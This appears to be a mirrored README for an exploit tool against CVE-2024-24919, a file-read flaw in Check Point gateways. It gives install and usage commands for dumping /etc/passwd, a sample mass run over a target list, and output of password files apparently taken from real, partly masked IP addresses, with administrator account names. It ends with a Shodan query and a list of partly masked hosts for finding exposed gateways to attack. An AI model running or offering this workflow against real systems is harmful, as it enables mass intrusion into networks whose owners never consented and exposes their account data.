Share
## https://sploitus.com/exploit?id=19B33FB7-5C74-50EB-BA63-77772D3A0EB0
# CVE-2024-24919
An Vulnerability detection and Exploitation tool for CVE-2024-24919
### Installation:
```bash
git clone https://github.com/RevoltSecurities/CVE-2024-24919
pip install -r requirements.txt
python3 exploit.py --help
```
### Usage:
```yaml
python3 exploit.py -h
______ ____ __ _ ______
/ ____/ __/ __ \/ / ____ (_)_ __/__ _____
/ __/ | |/_/ /_/ / / / __ \/ / / / / _ \/ ___/
/ /____> </ ____/ /__/ /_/ / / / / / __/ /
/_____/_/|_/_/ /_____|____/_/ /_/ \___/_/
@RevoltSecurities
[Description]: Vulnerability Detection and Exploitation tool for CVE-2024-24919
options:
-h, --help show this help message and exit
-u URL, --url URL [INF]: Specify a URL or domain for vulnerability detection
-l LIST, --list LIST [INF]: Specify a list of URLs for vulnerability detection
-ftd FILE_TO_DUMP, --file-to-dump FILE_TO_DUMP
[INF]: Specify a file path to dump (default: /etc/passwd)
-t THREADS, --threads THREADS
[INF]: Number of threads for list of URLs
-proxy PROXY, --proxy PROXY
[INF]: Proxy URL to send request via your proxy
-v, --verbose [INF]: Increases verbosity of output in console
-o OUTPUT, --output OUTPUT
[INF]: Filename to save output of vulnerable target]
```
### Sample Usage:
```yaml
python3 exploit.py -l targets.txt -t 200 -o output.txt -ftd /etc/passwd
______ ____ __ _ ______
/ ____/ __/ __ \/ / ____ (_)_ __/__ _____
/ __/ | |/_/ /_/ / / / __ \/ / / / / _ \/ ___/
/ /____> </ ____/ /__/ /_/ / / / / / __/ /
/_____/_/|_/_/ /_____|____/_/ /_/ \___/_/
@RevoltSecurities
[Vulnerable]: https://185.200.78.XXXX
### Never edit this file manually. In order to login as expert and allow scp access, run "bashUser on" ###
root:!:0:0:root:/:/bin/false
nobody:x:99:99:nobody:/nonexistent:/bin/false
ntp:x:38:38::/nonexistent:/bin/false
rpm:x:37:37::/nonexistent:/bin/false
pcap:x:77:77::/nonexistent:/bin/false
admin:x:0:0:Linux User,,,:/:/bin/bash
saytel_adm:x:0:0:Linux User,,,:/:/bin/clish
davidg_adm:x:0:0:Linux User,,,:/:/bin/clish
sshd:x:74:74:Privilege-separated:/var/empty/sshd:/bin/false
[Vulnerable]: https://207.232.4XX.XXX
### Never edit this file manually. In order to login as expert and allow scp access, run "bashUser on" ###
root:!:0:0:root:/:/bin/false
nobody:x:99:99:nobody:/nonexistent:/bin/false
ntp:x:38:38::/nonexistent:/bin/false
rpm:x:37:37::/nonexistent:/bin/false
pcap:x:77:77::/nonexistent:/bin/false
admin:x:0:0:Linux User,,,:/:/bin/clish
sshd:x:74:74:Privilege-separated:/var/empty/sshd:/bin/false
wansup:x:0:0:Linux User,,,:/:/bin/clish
[Vulnerable]: https://81.218.166.XXX
### Never edit this file manually. In order to login as expert and allow scp access, run "bashUser on" ###
root:!:0:0:root:/:/bin/false
nobody:x:99:99:nobody:/nonexistent:/bin/false
ntp:x:38:38::/nonexistent:/bin/false
rpm:x:37:37::/nonexistent:/bin/false
pcap:x:77:77::/nonexistent:/bin/false
ace:x:0:0:Linux User,,,:/:/bin/clish
joker:x:0:0:Linux User,,,:/:/bin/clish
sshd:x:74:74:Privilege-separated:/var/empty/sshd:/bin/false
```
### Info:
Wanna scrape targets and test then install our Unique tool [ShodanX](https://github.com/Revoltsecurities/Shodanx) and get realtime data of shodan from you Terminal
to scrape targets install the Shodanx and Use the command:
```yaml
shodanx custom -cq '"Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" 200' -fct ip -o targets.txt
shodanx custom -cq '"Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" 200' -fct ip -o targets.txt
_ _ __ __
| | | | \ \ / /
___ | |__ ___ __| | __ _ _ __ \ V /
/ __|| '_ \ / _ \ / _` | / _` || '_ \ > <
\__ \| | | || (_) || (_| || (_| || | | | / . \
|___/|_| |_| \___/ \__,_| \__,_||_| |_|/_/ \_\
Author : D.SanjaiKumar @CyberRevoltSecurities
[Version]:ShodanX current version v1.0.1 (latest)
[INFO]: Results Found for your query and facet: "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" 200 & facet:"ip"
[INFO]: 2.82.75.X
[INFO]: 5.102.XXX.XXX
[INFO]: 5.102.203.XXX
[INFO]: 5.102.210.XX
[INFO]: 5.102.211.23
[INFO]: 5.102.XXXX.127
[INFO]: 5.102.233.XXX
```
### About :
The tool is Developed by [D.Sanjai Kumar @RevoltSecurities](https://www.linkedin.com/in/d-sanjai-kumar-109a7227b/) to detect and exploit the Vulnerability CVE-2024-24919 , The tool is only for education and ethical purpose only and
Developers are not responsible for any illegal exploitations.